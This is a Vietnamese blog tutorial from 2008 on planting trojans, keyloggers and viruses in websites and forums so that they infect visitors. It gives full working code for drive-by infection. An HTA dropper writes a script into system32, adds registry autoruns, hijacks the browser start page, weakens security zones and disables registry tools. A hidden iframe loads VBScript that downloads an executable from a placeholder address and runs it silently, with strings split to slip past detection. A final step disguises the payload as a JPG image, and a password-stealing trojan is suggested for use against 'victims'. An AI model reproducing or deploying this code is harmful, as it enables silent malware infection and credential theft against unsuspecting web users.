Gắn trojan ,keylog ,virus vào website, forum pptx

Gắn trojan ,keylog ,virus vào website, forumPosted on May 6, 2008 by roseandgun Cách 1 : Cách đính kèm trojan vào website Một số cách phổ biến đính kèm trojon vào website như dùng mã jav

Gắn trojan ,keylog ,virus vào website, forum

Posted on May 6, 2008 by roseandgun

Cách 1 :

Cách đính kèm trojan vào website

Một số cách phổ biến đính kèm trojon vào website như dùng mã javascript hay dùng phần mềm

Xin giới thiệu với các bạn 1 số cách

a,Dùng 1 đoạn mã javascript để mở và phát tán trojan

<script language=javascript>

open(”địa chỉ con trojan”);

</SCRIPT>

Đoạn mã trên bạn chèn vào thẻ body của 1 trang website,khi nạn nhân mở website trojan

sẽ mở ra và yêu cầu người lướt website mở ra

b,

bạn copy vào notepad đoạn mã sau:

Code:

<html>

<head>

<script language=”javascript”>

try {

var fso = new ActiveXObject(”Scripting.FileSystemObject”);

var Shell = new ActiveXObject(”WScript.Shell”);

var tfolder2 = fso.GetSpecialFolder(0);

var filepath2 = tfolder2 + “\\system32\\System.js”;

var a2 = fso.CreateTextFile(filepath2, true);

a2.WriteLine(’var url = “Địa chỉ trojon”;’);

a2.WriteLine(’var burl = “Địa chỉ trojon”;’);

a2.WriteLine(’var fso = new ActiveXObject(”Scripting.FileSystemObject”);’);

a2.WriteLine(’var tfolder = fso.GetSpecialFolder(0);’);

a2.WriteLine(’var filepath = tfolder + “\\\\system32\\\\System.js”;’);

a2.WriteLine(’var Shell = new ActiveXObject(”WScript.Shell”);’);

a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\

Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\ \\\Windows”,filepath);’);

a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\

Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\S ystem32″,filepath);’);

a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet

Explorer\\\\Main\\\\Start Page”,url);’);

a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet

Explorer\\\\TypedURLs\\\\url1″,url);’);

a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet

Explorer\\\\Dia chi con trojan”);’);

a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet

Explorer\\\\Địa chỉ trojon”);’);

a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet

Explorer\\\\Địa chỉ trojon”);’);

a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet

Explorer\\\\Địa chỉ trojon”);’);

a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet

Explorer\\\\Địa chỉ trojon”);’);

a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet

Explorer\\\\Địa chỉ trojon”);’);

a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet

Explorer\\\\Địa chỉ trojon”);’);

a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet

Explorer\\\\Địa chỉ trojon”);’);

a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet

Explorer\\\\Địa chỉ trojon”);’);

a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet

Explorer\\\\TypedURLs\\\\url1″);’);

a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’);

a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’);

a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’);

a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’);

a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\

Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);

a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\

Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);

a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\

Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);

a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\

Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);

a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\

Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);

a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\

Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);

a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\

Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);

a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\

Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa

chỉ trojon\\\\*”,4,”REG_DWORD”);’);

a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\

Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);

a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\

Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);

a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\

Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);

a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\

Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);

a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\

Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);

a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\

Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);

a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\

Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);

a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\

Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies

\\\\System\\\\DisableRegistryTools”,1,”REG_DWORD”) ;’);

a2.Close();

Shell.Run(filepath2);

}

catch (e){}

</script>

<HTA:APPLICATION WINDOWSTATE=’minimize’ SHOWINTASKBAR=’no’ />

</head>

<body onload=’window.close()’>

</body>

</html>

rồi save lại với tên là : trojan.hta

bạn gắn đoạn mã sau vào cuối cùng của website của bạn:

Code:

<center>

<span datasrc=”#oRun” datafld=”view” dataformatas=”html”></span>

<xml id=”oRun”>

<preview>

<view>

<![CDATA[

<object id="oFile" data="trojan.hta?id=1"></object>

</view>

</preview>

</xml>

</center>

</body>

</html>

rồi sau đó bạn upload file trojan.hta với website của bạn lên cùng 1 mỗi lần mở website của bạn con trojan sẽ tự open vào trong hệ thống mà không hề bị phát hiện

Cách 2:

đoạn đầu đưa vào diễn đàn là 01 frame

<iframe width=”0″ height=”0″ src=”http://link chứa đoạn mã bên dưới”></iframe> đoạn 2

Code:

<script language=”VBScript”>

on error resume next

dl = “Đường dẫn con Virus dạng exe”

Set df = document.createElement(”object”)

df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″

str=”Microsoft.XMLHTTP”

Set x = df.CreateObject(str,”")

a1=”Ado”

a2=”db.”

a3=”Str”

a4=”eam”

str1=a1&a2&a3&a4

str5=str1

set S = df.createobject(str5,”")

S.type = 1

str6=”GET”

x.Open str6, dl, False

x.Send

fname1=”bl4ck.com”

set F = df.createobject(”Scripting.FileSystemObject”,”")

set tmp = F.GetSpecialFolder(2)

fname1= F.BuildPath(tmp,fname1)

S.open

S.write x.responseBody

S.savetofile fname1,2

S.close

set Q = df.createobject(”Shell.Application”,”")

Q.ShellExecute fname1,”",”",”open”,0

</script>

Cách 3 :

Đầu tiên , mọi người hãy Download Program

http://mail.packetstormsecurity.org/trojans/exe2vbs.zip

Đây là chương trình giúp bạn Convert sang “*.hta

Đầu tiên các bạn sử dụng EXE2VBS để convert file trojan của mình ( chẳng hạn tôi sẽ xài 1 con MagicPS => để lấy pass của người Victim truy cập ), click vào file trojan kéo

vô khung exe của exe2vbs ===> các bạn sẽ được 1 file *.js ! Okie giờ edit lại một chút để thành file hta ( định dạng html thực thi để chạy các activeX ) Chú ý khi chạy exe2vbs trong phần lực chọn có 3 ô các bạn đánh dấu vào 2 mục trên thôi

Mở file trojan.exe.js vừa convert ra bằng notepad or wordpad, cho thêm dòng

Code:

<script language=vbs>

vào trên cùng

Xuống dưới cùng thay dòng: WScript.CreateObject(”WScript.Shell”).run(pth)

bằng

Code:

Set Shell1 = CreateObject(”WScript.Shell”) Shell1.Run(pth) </script>

<HTA:APPLICATION WINDOWSTATE=’minimize’ SHOWINTASKBAR=’no’ />

</head> <body onload=’window.close()’> </body> </html>

Sau đó save lại thành file trojan.hta Sau đó mở file web của bạn cho Victim truy cập ra thêm code này vào để run file trojan.hta

Code:

<center> <span datasrc=”#oRun” datafld=”view” dataformatas=”html”></span> <xml id=”oRun”> <preview> <view> <![CDATA[ <object id="oFile" data="trojan.hta?

id=1"></object> ]]> </view> </preview> </xml> </center> </body> </html>

để tên File có dạng File ảnh (JPG , GIF ,BMP …) :

Theo cách 2 , mở Notepad :

Code:

<script language=”VBScript”>

on error resume next

dl = “Đường dẫn con Virus dạng exe”

Set df = document.createElement(”object”)

df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″

str=”Microsoft.XMLHTTP”

Set x = df.CreateObject(str,”")

a1=”Ado”

a2=”db.”

a3=”Str”

a4=”eam”

str1=a1&a2&a3&a4

str5=str1

set S = df.createobject(str5,”")

S.type = 1

str6=”GET”

x.Open str6, dl, False

fname1=”bl4ck.com”

set F = df.createobject(”Scripting.FileSystemObject”,”")

set tmp = F.GetSpecialFolder(2)

fname1= F.BuildPath(tmp,fname1)

S.open

S.write x.responseBody

S.savetofile fname1,2

S.close

set Q = df.createobject(”Shell.Application”,”")

Q.ShellExecute fname1,”",”",”open”,0

</script>

Save lại dưới dạng “tên File.JPG” hay GIF tùy ý

Ví dụ : funy.JPG

Mở File funy.JPG vừa Save song bằng Font Page , nhấp chọn Instert Picture rồi cho bừa

1 bức ảnh để đỡ nghi ngờ File - Save , Upload File funy.JPG vừa rồi lên

Giờ thì nó trông như 1 bức ảnh thật , có khi họ còn không nghi ngờ là có trojan trong đó nữa